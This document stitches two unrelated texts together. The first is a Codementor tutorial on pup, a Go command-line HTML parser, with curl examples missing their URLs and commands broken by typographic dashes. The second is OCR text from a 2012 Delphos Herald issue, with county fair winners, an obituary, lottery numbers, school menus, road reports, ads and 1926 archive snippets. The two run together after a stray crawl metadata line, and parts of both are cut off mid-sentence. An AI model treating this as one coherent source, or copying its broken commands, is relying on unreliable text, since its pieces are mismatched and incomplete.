Instead, try using other tools like Python’s BeautifulSoup or Ruby’s Nokogiri. However, since both processes are kind of slow, I was looking for a better way to do this, and eventually stumbled upon a Go package html. It’s an awesome HTML parser someone has already written for you, and you can import it into your code.
However, I really want to be able to use it with pipes, which is where pup comes in.
What is Pup?
Pup is a command line tool for parsing html, and it was originally inspired by jq and Data Science at the Command Line’s idea of using command line tools to analyze data. It’s filled with tools that can take things like xml, json, and it can do interesting things with them very quickly, dynamically, and flexibly.
First we’ll use the command
$curl –s –L
which will spit out nasty html. But we can use pup to analyze it
$curl –s –L | pup title
So if you use the command
pup title, all it will do is grab the title
<title>Google</title>
You can even filter for css selectors like the
strong tag
$curl –s –L | pup strong | head –n
You can also filter for div ids to get a certain portion/element of a webpage like this:
$curl –s –L | pup div#about <div id="about"> Go is an open source programming language that makes it easy to build simple, reliable, and efficient software. </div>
However, in this example, pup is still spitting out html. It’s better than before, but still not optimal. So we can do a cool thing and spit out text instead with
$curl –s –L | pup div#about text{} Go is an open source programming language that makes it easy to build simple, reliable, and
Which will just give us the text in the div.
Since you can chain pipe commands together, you can do some pretty intricate analysis of links.
For example, you can take sites like Reddit and YCombinator (HackerNews), grab all the top links on the websites (
p.title for Reddit,
td.title For HackerNews), grab children tags with
a[href^=http], and then spit out the attribute itself to print all the top links using pipes.
You can also add
json to make it even more consumable and get things like this:
$ curl -s | \ pup td.title a[href^=http] json{} [ { "attrs": { "href": "https:.../" }, "tag": "a", "text": "SHOW HN: pup" }, ... ]
Building CLI tools with Go
import java.util.Scanner; class Hello { public static void main(String[] args) { Scanner reader = new Scanner(System.in); System.out.print("Enter your name: "); String name = reader.nextLine(); System.out.printf("Hello, "+name+"!"); } }
This is something like the first program I wrote in java in college. All it does is execute a program and it prints your name. Basically, the
system.in and
system.out is the same thing as
stdin and
stdout respectively.
Why Go?
Why not Java?
Java is a nice programming language, but you’d need java installed in your computer and not everyone has it installed, so it’s not optimal. Furthermore, Java can get pretty messy.
Why not Python?
Python is cool, and I’ve actually prototyped pup in Python initially, but again, Python needs an interpreter and people need to have Python installed along with the specific packages you’d need, such as Beautiful soup. Most of all it’s because of personal taste—I prefer Go.
Why not C?
There is actually an HTML parser in C called Gumbo, but C is pretty difficult for me, so it’s not the language I’d personally use. Go, on the other hand, is easier.
package main import "fmt" func main() { fmt.Println("Hello, world!") }
So this is what Go looks like as a simple hello world program. Packages are exactly what you think they are so don’t really worry about it. We’ll import the fmt, and print hello world.
To better illustrate how Go programs work, I wrote a little program called Line:
package main import "io" import "os" func main() { io.Copy(os.Stdout, os.Stdin) io.WriteString(os.Stdout, "\n") }
Line will take some input from
stdin, write
stdout, and then append a line to it. You import a couple packages such as
io and
os. The first thing you’d do is copy
stdin to
stdout, and then write a string with
stdout. And there, you’ve written a go program, or command line tool, that can do something interesting.
$ echo "Hello, World" Hello, World $ go get github.com/ericchiang/line $ echo "Hello, World" | line Hello, World
This is what echo hello world looks like, and you can use go to get the line program, in which it will compile the line program and allow you to run it in your own computer.
GoX
GoX is a cross-compiler. For any of you who’s writing command line tools with go, I’d strongly recommend checking out GoX.
This is the release tool for pup—you can see it on github—and don’t worry about the bottom part, since it’s just messing with zip files. The important thing is this part:
gox -output "dist/{{.Dir}}_{{.OS}}_{{.Arch}}"
Where it will build parallels like this:
The cool thing is that Go has no dependencies like Python and is completely runnable on other systems like windows.
Books to recommend on Command line tools:
Shell Scripting will get you the general gist of using command line tools in a linux and unix environment.
Data Science at the Command Line is also an excellent book that will teach you how to analyze data using the command line tool
Codementor Eric Chiang is a software engineer and founding member at Yhat, a NYC startup building products for enterprise data science teams. Eric enjoys of Go, data analysis, Javascript, network programming, Docker, and grilled cheese sandwiches.
Need Eric’s help? Book a 1-on-1 session!
or join us as an expert mentor!
Or Become a Codementor!
Codementor is your live 1:1 expert mentor helping you in real time. | https://www.codementor.io/go/tutorial/pup-golang-cli-tools-eric-chiang | CC-MAIN-2017-34 | refinedweb | 1,845 | 69.82 |
Building Your Own Perl Modules
The Perl Journal January 2003
By Arthur Ramos Jr.
Arthur is a Systems Administrator and Adjunct Instructor at Orange County Community College in Middletown, New York. He is the owner of Winning Web Design () and can be contacted at aramos@sunyorange.edu.
The English language has been a vibrant, robust language for over a millennia. It has grown and expanded with the march of progress from the dark ages to the information age. It adapts itself well to our exponential increase in knowledge and to influences from other languages and cultures. This robustness is mirrored in the Perl programming language.
Perl was written to be extensible, to allow new functions and features to be added in without having to submit a request and wait for the next version. The Comprehensive Perl Archive Network (CPAN,) is the repository for all the modules that have been written by programmers from around the world. These modules have enhanced Perl with powerful features allowing CGI programming, Database access, LDAP management, X windows programming, and much, much more. These modules can be downloaded and installed, enhancing the local version of Perl. This is analogous to a dialect of the English language.
Not only can modules be downloaded and installed from CPAN, but programmers can write modules for use on the local machine. Rather than cutting and pasting useful subroutines from one script to another, and dealing with the maintenance morass that creates, why not create a local Perl module containing the nifty subroutine? This module can then be included in each script that needs the subroutine. The scripts can use the subroutine as though it was hardcoded into the script file. When changes are made to this subroutine, the new version will automatically be picked up by the scripts.
I had just such a subroutine, one that I had duplicated in many different languages over the years. This subroutine started out as a Fortran subroutine! The subroutine's name is oneof. It is passed a search value and a list of valid values separated by a specified character. It returns a 0 if the value is not found in the list, or an index 1..n specifying which value the search value matched. This allows me to do quick testing of values without having to define extraneous variables in my script. The following fragment shows how the oneof subroutine is used, in this case without testing the return variable:
$mine = "of"; if (oneof($mine,"this,is,only,a,test,of,oneof")) { print "Found it in the string\n"; } else { print "NOT FOUND\n"; }
This fragment shows the use of oneof, this time testing the return variable:
$mine = "of"; if ($item = oneof($mine,"this,is,only,a,test,of,one of")) { print "Found it in the string at location $item\n"; } else { print "NOT FOUND\n"; }
If the list of valid values is separated by a character other than a comma, a third value can be passed containing the separator character:
$mine = "of"; if ($item = oneof($mine,"this;is;only;a;test;of;one of",";")) { print "Found it in the string at location $item\n"; } else { print "NOT FOUND\n"; }
The full subroutine with comments is shown in Example 1.
More experienced Perl programmers would probably write the same subroutine without the comments and with as few extra variables as possible. This is where obfuscated Perl code beginstrying to do a task with as few characters as possible. Presented here is a slightly obfuscated version of the oneof subroutine to make later examples more succinct:
sub oneof { if ($_[2]=~/^$/ || $_[2]!~/.{1}/) {$_[2]=",";} @l = split(/$_[2]/,$_[1]); for ($x=0,$f=0;$x<$#l;$x++) { if ($_[0] eq $l[$x]) { $f=$x+1; last; } } return $f; }
In order to modularize this subroutine, create a Perl module file. In vi (or whatever editor you prefer) open a file called ONEOF.pm. I capitalize the module name so that it will stand out in my Perl scripts. In this file, there is no bang command to specify that perl is to be run (no #!/usr/bin/perl). The first line defines the module's namespace. A namespace is a separate area set aside for the package so that variables and subroutines within will not clobber items with the same name in the main script. In this example, we will use a namespace called ONEOF, which I also capitalize to set it apart from the subroutine name oneof:
package ONEOF;
We then have to tell the package that the subroutine name oneof can be exported to the main script's namespace. Another package, called "Exporter," is required to perform this task. Include the Exporter package in the new module (from here on, bold code signifies the newly added material):
Package ONEOF; Use Exporter; @ISA = ('Exporter');
Or, alternatively, you could write that last line as:
@ISA = qw(Exporter);
The programmer must specify to the Exporter module that the subroutine oneof can indeed be Exported to other namespaces:
Package ONEOF; Use Exporter;@ ISA = qw(Exporter); @EXPORT = ('oneof');
Again, you could use @EXPORT = qw(oneof); for that last line. Next include the text of your subroutine, and then terminate the module with a 1;. This terminator is required.
Package ONEOF; Use Exporter;@ ISA = qw(Exporter)@ EXPORT = qw(oneof); sub oneof { if ($_[2]=~/^$/ || $_[2]!~/.{1}/) {$_[2]=",";} @lst = split(/$_[2]/,$_[1]); for ($x=0,$f=0;$x<$#lst;$x++) { if ($_[0] eq $lst[$x]) { $f=$x+1; last; } } return $f; } 1;
This is now a complete Perl module. Make sure that ONEOF.pm is either in the same directory as the script that will be run, or in a directory specified in the PATH environment variable. In the script that contains the test fragment shown at the beginning of this article, specify to Perl that you want to use the ONEOF.pm module:
use ONEOF;
$mine = "of"; if ($item = oneof($mine,"this,is,only,a,test,of,one of")) { print "Found it in the string at location $item\n"; } else { print "NOT FOUND\n"; }
If we had not exported the oneof subroutine from the module, we would have to explicitly reference the namespace and subroutine name:
ONEOF::oneof
The if statement in our test fragment would be changed to:
if ($item = ONEOF::oneof ($mine,"this,is,only,a,test,of,oneof")) {
This facility was written in this way to give the programmer control over what can be accessed between namespaces. To eliminate having to specify the namespace when not doing the exporting in the module itself, modify the use statement to explicitly export a specific subroutine within the module:
use ONEOF ('oneof');
or
use ONEOF qw(oneof);
Multiple subroutines can be placed in a single Perl module. Try to collect subroutines that perform similar functions in individual modules (for example, "MYPRINTERS.pm"). If you are programming in an organization, a good suggestion would be to use the organization's initials at the beginning of the module name to show other programmers that this module is local. For example, I am employed by Orange County Community College in Middletown, NY, so I would use a module name such as OCCCPRINTERS.pm. When you have several subroutines in a module that need to be exported, separate the subroutines with a space in the @EXPORT statement:
@EXPORT = ('subone' 'subtwo' 'subthree');
Likewise, if you are explicitly referencing multiple subroutines in your script, use this same convention:
Use OCCCPRINTERS ('subone' 'subtwo' 'subthree');
And that's it. This will help you begin to modularize your Perl code. We'll get into more advanced modularization topics and namespace usage in future articles.
TPJ | http://www.drdobbs.com/web-development/building-your-own-perl-modules/184415975 | CC-MAIN-2015-35 | refinedweb | 1,278 | 57.1 |
VUser::Log - Logging support for vuser
use VUser::Log qw(:levels); my $log = new VUser::Log($cfg, $ident); my $msg = "Hello World"; $log->log($msg); # Log $msg at level LOG_NOTICE $log->log(LOG_DEBUG, $msg); # Log $msg at level LOG_DEBUG $log->log(LOG_DEBUG, 'Crap! %s', $msg); # Logs 'Crap! Hello World'
Generic logging module for vuser.
$log = VUser::Log->new($cfg, $ident); $log = VUser::Log->new($cfg, $ident, $section);
A reference to a tied Config::IniFiles hash.
The identifier for this log object. This will be used to tag each log line as being from this object. This is similar to how syslog behaves.
This tells VUser::Log which section of the configuration (represented by $cfg) to look for settings in. If not specified, vuser will be used.
When you decided that it's time to log some info you call the VUser::Log object's log() method. log() can be called in one of three ways.
$log->log($level, $pattern, @args);
$level is the log level to use. You can import the LOG_* constants into your namespace with
use VUser::Log qw(:levels);.
$pattern is a formatting pattern as used by printf().
@args are the value for any placeholders in $pattern.
$log->log($level, $message);
You can omit the pattern and simply pass a text string to log.
$log->log($message);
You can even omit the log level and the message will be logged with a level of LOG_NOTICE.
The levels are, in increasing order of importance: DEBUG, INFO, NOTICE, WARN, ERROR, CRIT, ALERT, EMERG. ERR is provided as a synonym for ERROR.
You can import the LOG_* constants for use where ever log levels are needed by using
use VUser::Log qw(:levels).
Extensions do not need to create a new VUser::Log object. You can simply use $main::log or do something like this:
my $log; sub init { ... $log = $main::log; ... }
After that, you can use $log anywhere in your extension.
[vuser] # The log system to use. log type = Syslog log level = notice
Note: Each log module will have it's own configuration.
VUser::Log uses subclasses to do the actual logging.
Subclasses of VUser::Log must override, at least, these methods.
Any module specific initialization should be done here. init() takes only one argument, a reference to the config hash created by Config::IniFiles.
This method will do the actual writting of the log messages. It takes two parameters, the log level and the message. | http://search.cpan.org/~rsmith/vuser-0.5.0/lib/VUser/Log.pm | CC-MAIN-2017-30 | refinedweb | 407 | 76.32 |
The Delphos Herald
Telling The Tri-County’s Story Since 1869
Delphos, Ohio
Saturday, August 25, 2012
50¢ daily
From the Thrift Shop, p5
Wildcats win season opener, p6
Upfront
Allen County Fair
Commission needs help moving boat
Delphos Canal Commission Trustees need assistance at 5:30 p.m. Wednesday to move the remains of the Marguerite from a storage trailer into the museum for display. Those who assisted in removing the boat from the museum in 1987 have a special invitation to attend. Those interested are to meet on Main Street in front of the Canal Commission Museum.
‘Free Food on Us’ set Tuesday
The Delphos Community Unity “Free Food on Us” will be held from 3-5 p.m. on Tuesday at the Delphos Eagles Lodge. The doors open at 2 p.m. Food will be distributed on a first-come, first-served basis to income-eligible resident of the Delphos City School District. Identification and a self-declaration of income are needed.
Elwer shows champion hog
BY STACY TAFF
staff@delphosherald.com
Troy Elwer
LIMA — Troy Elwer of Delphos took Grand Champion during the Jr. Fair Market Hog Show Wednesday at the Allen County Fair, a win he attributes to sticking with methods that work.
“I don’t think I really did anything better or different this year; I did the same things I did when I won back in 2009,” Elwer said. “I treat all my pigs the same; it’s just that this pig did better.”
Elwer, who will be a seventh-grader at St. John’s this year, says raising hogs keeps him busy.
“We spend probably 35-40 hours a week, just feeding, rinsing and working with them. That’s probably my favorite part of showing; just spending time with the pigs,” he said. “I showed two at the Ohio State Fair this year and two at the county fair. I didn’t show any other animals this year; just pigs. I’m not sure about next year, right now we’re just thinking about what we want to do.”
Before he heads to the fair again, Elwer hopes to make some improvements to his techniques. “I would like to improve in showmanship; I’d like to win in my age group,” he said. “Right now, I’m at beginner level showmanship, so next year will be my first year at junior level.”
Elwer, who will turn 13 in September, keeps busy throughout the year with football, basketball and baseball. He is the son of Scott and Chrissy Elwer.

Joseph takes Grand and Reserve Grand Champion with goats
BY STACY TAFF
staff@delphosherald.com
Megan Joseph
DELPHOS — For the third consecutive year, Megan Joseph took home one of the top prizes in the Born and Raised Goat competition of the Allen County Fair. This year, she was named Reserve Grand Champion after taking Grand Champion the last two years. Joseph isn’t too disappointed — this is also the first year she won Grand Champion in the Market Goat competition.
“Last year I was close to Reserve but this is the first year I’ve won,” she said. “I like to think my experience plays a role. I worked with my goats a lot more and kind of put together everything I’ve learned over the years.
See JOSEPH, page 2

Sports
TODAY
Football: Lima Central Catholic at St. John’s, 7:30 p.m.
Boys Soccer: Ottoville at Bryan, 1 p.m.; Van Buren at Kalida, 1 p.m.; Spencerville/Elida and Fort Jennings/Bluffton at Elida Soccer Classic, 5/7 p.m.
Girls Soccer: Fort Jennings at St. John’s (JV 1st), 11 a.m.; Ottoville at Bryan, 11 a.m.; LCC at Jefferson (NWC), noon
Boys Golf: Ottoville, Lincolnview, Spencerville and Kalida at the Allen East Tournament (Springbrook), 8:30 a.m.
Volleyball: Columbus Grove tri-match, 10 a.m.; Elida at Leipsic, 12:30 p.m.
Co-ed Cross Country: Ottoville, Lincolnview, Spencerville, Kalida, Columbus Grove and Crestview at St. John’s Invitational (Stadium Park), 9 a.m.
Redmond oldest person at fair Thursday
BY MIKE FORD
mford@delphosherald.com
Charlene Redmond
DELPHOS — On any given day, Allen County Fair organizers bestow the notoriety of being the oldest person at the fair on the person deserving of the title. Wednesday, the honor went to Charlene Redmond of Delphos, who turned 100 earlier this year.
With her full mental faculties and quick wit intact, Redmond lives in the assisted living side of Vancrest Healthcare Center. For eight years, Activities Director Barb Brotherwood has taken her to the fair, figuring she would win. With three digits, she would not be denied this time.
When asked how she felt about winning, she indicated it was better than one of the alternatives. “I guess it’s an honor,” she said. “I don’t feel any different than I ever did but I didn’t want to die, so I guess I wanted to win.”
Born and raised in Lima, Redmond moved to Delphos with her husband to raise their three daughters in the 1930s. At the time, the fair was still held in local streets.
“Then Lima went and took it away from us. That made some of us mad; I didn’t even go to the fair for a while because they took it from us but I forgave them,” she said.
Index
Obituaries 2
State/Local 3
Politics 4
Community 5
Sports 6
Church 7
Classifieds 8
TV 9
World news 11

Forecast
Clear tonight and in the mid-60s; then sunny Sunday with a high in the upper 80s.
Reindel double champ at fair
BY STACY TAFF
staff@delphosherald.com
Austin Reindel
LIMA — This year’s Allen County Jr. Fair has been a good one for 19-year-old Austin Reindel, son of Mike and Karen Reindel of Delphos. In addition to snagging Reserve Grand Champion in the Market Hog Show, Reindel also won Champion of Champions Showmanship and second overall in showmanship with his steer.
“I worked more on showmanship this year, getting the hog to walk with its head up and just working on presentation,” he said. “It felt like that really helped me out with everything. I still need to do a lot of work on keeping his movements smoother. I’ve never won showmanship with hogs before now but I’ve won with steers and I think that gives me a bit of an edge.”
The number of hours it takes to care for the livestock Reindel shows is equivalent to the average full-time job. He says it would be a lot harder without the help of his family.
See REINDEL, page 2
Dan Heath/Paradise Band closes concert series
File photo
Dan Heath and the Paradise Band will close out the Delphos Rotary Club’s Music in the Park series at 6 p.m. on Sunday. Dan Heath has assembled the finest musicians from Northern Indiana to present Sinatra, Tony Bennett, Nat King Cole, Bobby Darin, the Beatles, Elvis, Michael Bublé and 50s-60s rock’n’roll. Food service begins at 5:30 p.m.
HIGH SCHOOL SCOREBOARD
DELPHOS TRADING POST
JUST LIKE AN OLD FASHIONED TRADING POST
We BUY, SELL, and TRADE goods of all types. We buy, sell, and trade just about anything that is in good shape and has a market value.
We also buy and sell new and used fire arms, gold and silver, antiques and collectibles; so come see us at the Delphos Trading Post and let us help your dollars go further.
STOCK CHANGES DAY TO DAY! IF YOU WANT IT AND WE DON’T HAVE IT, WE’LL TRY TO FIND IT FOR YOU.
Jefferson 38, Waynesfield 17
Bryan 56, Van Wert 0
Elida 30, Piqua 7
Mar. Local 42, Shawnee 28
Bath 63, Allen East 42
Celina 46, Versailles 26
Col. Grove 40, Pan. Gilboa 6
Crestview 40, Parkway 16
Hours: Wed. & Thurs. 8:30-7:00; Friday 8:30-5:00; Saturday 8:30-4:00; Closed Sun., Mon. & Tues.
528 N. Washington St., Delphos
419-692-0044
Right on the corner of 5th St. and N. Washington St. next to Bellman’s Party Shop.
Spencerville 63, Perry 7
2 – The Herald
Saturday, August 25, 2012
My summer vacation ...
NANCY SPENCER
On the Other hand

The nights are cooler. From the Firemen’s Convention to Relay to three county fairs, with the Fourth of July and Fort Jennings turning 200 thrown in the middle, there’s plenty to do.
Once again, we were honored with hosting Murray’s granddaughter, Claire. A delightful 16-year-old, she brought a breath of fresh air to the newsroom when she graced us with her presence. She spent some time in each department and she even went out on assignment by herself.
Her visit was too early for the fair this year. I was a little bummed. I like the fair so much and can’t get there and she doesn’t have her fair shoes yet. Last year was Claire’s first ever trip to a county fair. I know it’s hard to imagine when they are a part of your life that some people have never experienced one. Nonetheless, she can check off her annual visit to Delphos.
One thing I can mark off my list is surviving what I have dubbed “The 2012 Blackout.” I won’t soon forget those 4 1/2 days that were hot as h-e-double hockey sticks. I know, I know, some were without power for a lot longer than I was but it doesn’t mean I can’t be snarky at the thought of doing it again. It was pretty crappy.
I also got to spend some quality time with Cameron and friends. He’s doing well and started his fall classes this week. He’s very busy and has to remind me that I can also call him.
I am super excited about Labor Day weekend — the last weekend of summer. Just happens to be my birthday weekend. What? You say. Please, no gifts. I have everything I need. Really. I have a pretty good date for a birthday. It’s kind of a last hurrah of summer and then a segue into my favorite season — fall. I can almost hear the crunch of the leaves and smell the first frost.
Editor’s note: So now I want to know what you guys did this summer. Send pictures of your summer activities to nspencer@delphosherald.com or drop them off at the office. Make sure you identify the people in the photos, what they are doing and where they are doing it. We’ll put them in the paper and you’ll have another souvenir or memory of your summer.

For The Record

Joseph
(Continued from page 1)
I had a good goat to start with and all of that plays a role too.” This year, Joseph has two market goats, three breeding projects and four kids at the fair. She tries to spend time working with them every day. “I work with my goats about 10 hours a week — probably about an hour and a half a day — with feeding them and walking them. Exercise is a big thing. I worked on the feed a lot this year, concentrating on how much protein they get. Another thing I did different this year is I worked with the breeding stock a lot better.” Last year was the first year the St. John’s High School junior tried out for fair royalty. She was named Jr. Fair Goat Queen. “I wanted to try out for Jr. Fair Queen this year but I wasn’t old enough, so I’ll try next year,” she said.
The daughter of Norm and Kim Elwer usually shows dogs at the fair as well. “I recently had to give that up,” she said. “It was just too much with all of the other activities I have going on.”
In addition to her fair activities, Joseph keeps busy with track and cross country training.
Joseph loves working with her goats, but the things she loves most about showing them at the fair are the lessons and knowledge that come with the experience. “My favorite thing is just coming out and showing; doing my best whether I win or lose,” she said. “I love getting into that competition and hearing what the judge says and taking that into the next year.”
“I really owe a thank-you to my parents and my advisor,” Joseph added. “They’ve helped me so much and if they hadn’t been there for me I wouldn’t have accomplished any of this.”

Reindel
(Continued from page 1)
opportunities he’s enjoyed and the help given by his father. “I really feel I need to thank my dad, not just for all of the work he does but for everything he’s sacrificed to make showing possible for us kids. He does a lot,” he said.
The Delphos Herald
Nancy Spencer, editor
Ray Geary, general manager
Don Hemple, advertising manager
Tiffany Brantley, circulation manager
Delphos Herald, Inc.
Vol. 143 No.53
(Continued from page 1)
ODOT REPORT
Phase 1 of a 3-phase project which will reconstruct Interstate 75 from the Auglaize County line to just north of Ohio 81, including the city of Lima. Work on the …
PUBLIC INVITED
Christopher Long, Ohio Christian Alliance President, speaking at Delphos K of C Hall, Elida Ave., 7:00 p.m. Tuesday, August 28th. Speaking on Separation of Church and State.
Free educational opportunity. For info and yard sign, go to site.
drainage work and paving on the ramps. Following the Labor Day holiday, … Bryn Mawr Road from Reservoir Road to Elm Street also closed May 1 until late fall. Traffic on Interstate 75 in the area of the bridge is maintained, two lanes in each direction, with occasional nighttime lane closures necessary at times. Interstate 75 southbound from Ohio 81 to Fourth Street reduced to one lane through the work zone on Monday and Tuesday for pavement repair. The restriction will be in place until 11 a.m. Interstate 75 southbound from Ohio 81 to Ohio 65 reduced to one lane through the work zone on Thursday for pavement repair. The restriction will be in place until 11 a.m. U.S. 30 from Ohio 65 to Ohio 696 is restricted to one lane through the work zone for a pavement repair and resurfacing project which will continue through November.
Putnam County
U.S. 224 between the Van Wert line and Ohio 66 will be restricted to one lane through the work zone for pavement repair. Ohio 634 between U.S. 224 and Ohio 613 will be restricted to one lane through the work zone for pavement repair. Ohio 114 between Ohio 694 and U.S. 224. Ohio 65 at the north edge of Leipsic closed Aug. 20 for three days for a railroad crossing repair. Traffic detoured onto Ohio 613, Ohio 108 and Ohio 18 back to Ohio 65.
Van Wert County
U.S. 30 east of Van Wert will be restricted to one lane through the work zone for pavement and joint repair. Ohio 66 between Delphos and Ottoville restricted to one lane through the work zone for removal of pavement reflectors.
“We raise our own pigs and there’s just so much work that goes into it,” he said. “Dad is out there at 6 a.m. and 10 at night every day and we’re always out there rinsing, making sure the pens are clean. We all work on the pigs together, so it’s really a family project. That’s the best part, the family part of it. We enjoy getting that quality time together.”
With this most likely being Reindel’s last year, he expressed gratitude for the opportunities he’s enjoyed and the help given by his father. “I really feel I need to thank my dad, not just for all of the work he does but for everything he’s sacrificed to make showing possible for us kids. He does a lot,” he said.

LOTTERY
CLEVELAND (AP) — These Ohio lotteries were drawn Friday:
Mega Millions: 25-34-45-46-49, Mega Ball: 34; Megaplier: 2
Powerball: Estimated jackpot: $50 million
Pick 3 Evening: 3-2-5
Pick 3 Midday: 4-8-9
Pick 4 Evening: 6-7-2-9
Pick 4 Midday: 1-2-4-4
Pick 5 Evening: 6-0-2-6-8
Pick 5 Midday: 4-2-2-7-0
Rolling Cash 5: 09-13-26-28-34; Estimated jackpot: $110,000

FUNERAL
RODE, Virginia C., 84, of Delphos, Mass of Christian Burial begins at 11 a.m. today at St. John the Evangelist Catholic Church, the Rev. Chris Bonsack officiating. Burial will follow in Resurrection Cemetery. Memorials are to St. Rita’s Hospice.
WERNER, Jack E., 86, of Florida and formerly of Delphos, services will begin at 11 a.m. Monday at Harter and Schier Funeral Home, the Rev. Angela Khabeb officiating. Burial will be in Walnut Grove Cemetery with military rites by the Delphos Veterans Council. Friends may call from 2-4 p.m. Sunday and one hour prior to the services Monday at the funeral home. Memorial contributions may be made to the American Cancer Society or Tuscany/Hospice House of Marion County.

Answers to Friday’s questions:
Don Rickles played CPO Otto Sharkey on TV.
Abbott and Costello’s first starring movie was Buck Privates.
Today’s questions:
What was the name of Crusader Rabbit’s sidekick?
What magazine always features an obituary on the last page?
Answers in Monday’s Herald.
Today’s words:
Dactylion: a finger exercise for pianists
Delphos St. John’s — Week of Aug. 28-31
Tuesday: Hamburger sandwich/pickle & onion, assorted fries, Romaine salad, peaches, fresh fruit, milk
Wednesday: Sloppy Joe sandwich, peas, Romaine salad, Mandarin oranges, fresh fruit, milk
Thursday: Italian grilled chicken sandwich, broccoli/cheese, Romaine salad, mixed fruit, fresh fruit, milk
Friday: Stuffed crust pepp. pizza, green beans, Romaine salad, applesauce, fresh fruit, milk

Delphos City Schools — Week of Aug. 28-31
Tuesday: Hamburger sandwich, cheese slice, french fries, orange juice bar, low fat milk
Wednesday: Pepperoni pizza, Romaine salad, strawberries, low fat milk
Thursday: Chicken patty sandwich, green beans, chilled peaches, low fat milk
Friday: Franklin: Hot dog sandwich; Middle & Senior: Footlong hot dog, corn chips, baked beans, diced pears, low fat milk

Spencerville Schools — Week of Aug. 28-31
Tuesday: Breaded chicken patty sandwich, broccoli w/cheese, pineapple, milk
Wednesday: Hamburger sandwich, baked beans, peaches, milk
Thursday: Breakfast pizza, smiley fries, apple slices, milk
Friday: Cavatini, salad w/carrots, garlic breadstick, applesauce, milk

Lincolnview — Week of Aug. 27-28
Monday: Chicken patty/bun, California blend, mixed fruit, milk
Tuesday: Pepperoni pizza, garden peas, pineapple, milk
Wednesday: Hot dogs/bun, baked beans, applesauce, milk
Thursday and Friday: No school — Fair Day

Ottoville — Week of Aug. 27-31
Monday: Chicken patty w/lettuce, carrot stix, peaches, brownie, milk
Tuesday: Taco salad 4-12, tacos K-3 w/cheese-lettuce-tomato, cookie, mixed fruit, milk
Wednesday: Grilled cheese, broccoli, chips, pineapple, milk
Thursday: Spaghetti, breadstix, peas, applesauce, milk
Friday: Corn dog, corn chips, green beans, peaches, milk

Fort Jennings Local Schools — Week of Aug. 28-31
Monday: Taco, refried beans, mixed vegetables, fruit
Tuesday: Fiestata, peas, dessert round, fruit
Wednesday: Spaghetti & meatsauce, breadstick, green beans, fruit
Thursday: Corn dog, carrots, cheese stick, fruit
Friday: Spicy chix sandwich, cheese slice, broccoli, fruit

Landeck Elementary — Week of Aug. 28-31
Tuesday: Hamburger sandwich, green beans, fruit, milk
Wednesday: Spaghetti with meat sauce, bread stick, cheese slice, fruit, milk
Thursday: Turkey sandwich, mashed potatoes & gravy, fruit, milk
Friday: Toasted cheese sandwich, corn, fruit, milk

Elida — Week of Aug. 28-31
Tuesday: Chicken nuggets w/dip, green beans, applesauce, fresh fruit, dinner roll, milk
Wednesday: R.S. cheese pizza, steamed broccoli, diced peaches, fresh fruit, milk
Thursday: Salisbury steak, mashed potato & gravy, grapes, fresh fruit, whole grain bread stick, milk
Friday: Hamburger w/pickle, baked beans, Mandarin oranges, fresh fruit, rice krispy treat, milk
AT OUR NEW LOCATION:
203 N. MAIN ST. • DELPHOS ★ GRAND PRIZE: 15.6” LAPTOP COMPUTER ★
• NEW COMPUTER TOWERS $299 & UP • NEW LAPTOPS $399 & UP
Computer repair since 1993
Good Selection
Make a qualified purchase from 8-6-12 to 9-6-12 and you will be entered for a drawing for prizes at our Grand Opening on Sept. 7th & 8th. See our website for details.
WHY PAY MORE?
• LG FLAT PANEL TVs
• BLU-RAY PLAYERS
• SOUND BARS
• HOME THEATER SURROUND SOUND
• USED COMPUTERS for home & small business
• SCREEN SIZES from 22” to 65”
• COMPUTER ACCESSORIES
CHECK OUR PRICES

The Dancer By Gina announces NEW Adult Zumba classes! Classes start Sept. 10 on Mondays or Thursdays, 6:30-7:15 p.m. Join the 10-week session or walk in! Tell a friend and call today! 419-692-6809 Thedancerbygina.com
203 N. Main St. (old Westrich location) • Delphos • 419-692-5831 email dangerd@wcoil.com
GERDEMAN’S TV & COMPUTER
for SPECIALS OF THE WEEK! “Buy with service after the sale since 1952”
RED BOX AT McDonald’s
FALL LEAGUE OPENINGS — Sunday Mixed League. Call or stop in for all details.
AUGUST BOWLING SPECIAL — only $2 per game!
NEW BRUNSWICK PRO LANE SURFACE
Stop in for lunch or snack... Full line of sandwiches, side dishes, your favorite beverages.
OPEN AT NOON MONDAY THRU SATURDAY
Delphos Recreation Center
939 E. Fifth St., Delphos 419-692-2695
Saturday, August 25, 2012
The Herald –3
----------
Palestine to get electrification
French and British engineers have completed a project which it is hoped will be put in place very soon for the electrification of Palestine by causing the waters of the Eastern Mediterranean to flow over a 250-foot ridge bordering the coast, thence through a canal cut out of solid rock, whence the waters would hurl down in an almost sheer drop into Lake Tiberias and the Dead Sea, a drop of more than one thousand feet. It is estimated that the total electric energy developed would be sufficient for Palestine, Syria, Asiatic Turkey and Egypt. The total cost is placed at about $75,000,000. Able scientists have calculated the net energy at 420,000 H.P.
Delphos Herald, Sept. 8, 1926
----------
Delphos fans plan to see Babe Ruth play
A number of Delphos baseball fans are planning to go to Lima Friday to see the great “Bambino” play ball. Lima and Celina are to play the deciding series which was evened out Sunday when Celina won by a score of 1 to 0. In addition to Ruth, the Lima club will have such stars as Billy Southworth, St. Louis outfielder; Frank Gilhooley and Micky Heath of the Toronto minor league champions, and Pinke Pitting, late of the Louisville club and now the property of the Cincinnati Reds, in its lineup. With Celina will be Bruno Betzel, Louisville infielder; Tavener of the Detroit Tigers and Ty Freigau of the Cubs, besides other league luminaries.
Delphos Herald, Oct. 13, 1926
----------
Two women shoplifters
The local police have identified two women, who, it is alleged, were guilty of shoplifting in Delphos a few days back. The two visited several local stores, among them the Lange Dry Goods store, the Remlinger Drug Store and the Neuer 5 and 10 cent store. In the last named place, it is claimed, one of the women was seen by Miss Theresa Neuer taking some merchandise and putting it into a large bag which she was carrying. Miss Neuer accused her of stealing and took hold of the bag.
The woman ran and the handle of the bag, tearing loose, was left behind. In the bag were found silk remnants and a table scarf, stolen from the A.H. Lange store; a vanity case and powder puff from the Remlinger store; and stockings and two silver table mats from the Neuer store. The women, the police state, have agreed to come in and make settlement. Their names are not being announced and it is likely that no arrests will be made. Miss Neuer secured the license number of a car in which the two women left the city.
Delphos Herald, Oct. 13, 1926
----------
Hog cholera raging near Delphos
Hog cholera is still playing havoc with hogs in this vicinity. The disease continues to be doing most damage southeast of the city. One man in that territory lost forty hogs and others are reporting heavy losses. Many of the farmers are having their hogs inoculated to prevent them from taking the disease.
Delphos Herald, Oct. 13, 1926
----------
Finds story of Columbus’ last trip to America
